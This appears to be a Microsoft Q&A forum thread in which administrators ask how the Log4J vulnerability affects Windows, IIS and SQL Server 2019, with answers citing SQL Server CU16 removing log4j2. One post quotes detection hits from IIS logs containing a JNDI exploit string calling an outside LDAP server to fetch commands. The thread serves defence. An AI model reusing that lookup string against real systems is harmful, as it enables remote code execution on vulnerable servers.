The latest patch CU16 has the solution to this issue.
KB5011644 - Cumulative Update 16 for SQL Server 2019
14669019
"Removes log4j2 used by SQL Server 2019 Integration Services (SSIS) to avoid any potential security issues."
This browser is no longer supported.
Upgrade to Microsoft Edge to take advantage of the latest features, security updates, and technical support.
Hi Team,
As there is a Log4J vulnerability trending recently. May I get clarifications for the below points.
1) How the Log4J vulnerability impacting my Windows hosts?
2) How can I prevent or take precautions from getting affected by Log4J?
3) Microsoft released any patches for mitigating this vulnerability?
4) does it affect any other applications released by Microsoft like MSSQL, SCCM or IIS etc.
Kindly provide the updates on this.
The latest patch CU16 has the solution to this issue.
KB5011644 - Cumulative Update 16 for SQL Server 2019
"Removes log4j2 used by SQL Server 2019 Integration Services (SSIS) to avoid any potential security issues."
Hello @ABDUL SAHAD
You can find Microsoft official guide and statements here:
Hope this helps with your query,
-----------
--If the reply is helpful, please Upvote and Accept as answer--
We are seeing this in Windows Servers that run Remote Web Access or even Exchange Servers OWA; the Jar stuff is in there, its old, its being flagged as vulnerabilities; and attempts being made to exploit it - as per our Datto RMM. We have only installed MS IIS, RWA, OWA etc. no other 3rd party web server tools; so it seems to us that Microsoft application servers are using the L4j in Inetpub logging;
Example;
SUSP_JDNIExploit_Indicators_Dec21 C:\inetpub\logs\LogFiles\W3SVC1\u_ex211210.log
0x1710:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
0x1829:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
0x1c1a:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
0x1d33:$xr1: ldap://45.155.205.233:12344/Basic/Command/Base64/
Through a support case with Microsoft their response is as follows;
"Anyone at all that has a Internet facing server is getting scanned since this became public. Seeing attempts in the IIS logs doesn’t necessarily indicate a compromise. It could just mean that someone is looking to fingerprint your machine to see if it is vulnerable.
The vulnerability is in an Open Source Java logging library so unless you added a 3rd party application that uses Log4J2 it is unlikely that you are vulnerable to this exploit.
It may be worth looking into a 3rd party vulnerability scanner the help determine your systems are vulnerable."
Can confirm we are seeing the old version of Log4J in our SQL Server 2019 Standard DTS folder as well. Wondering what the best upgrade path would be, can it be deleted or just replaced?
ERottier is correct. SQL put it there when installing SQL 2019 Ent. I'm assuming it's for Java check box when installing sql 2019? Anyway, can this be safely removed from the directory? In fact, can the whole JARS folder be removed?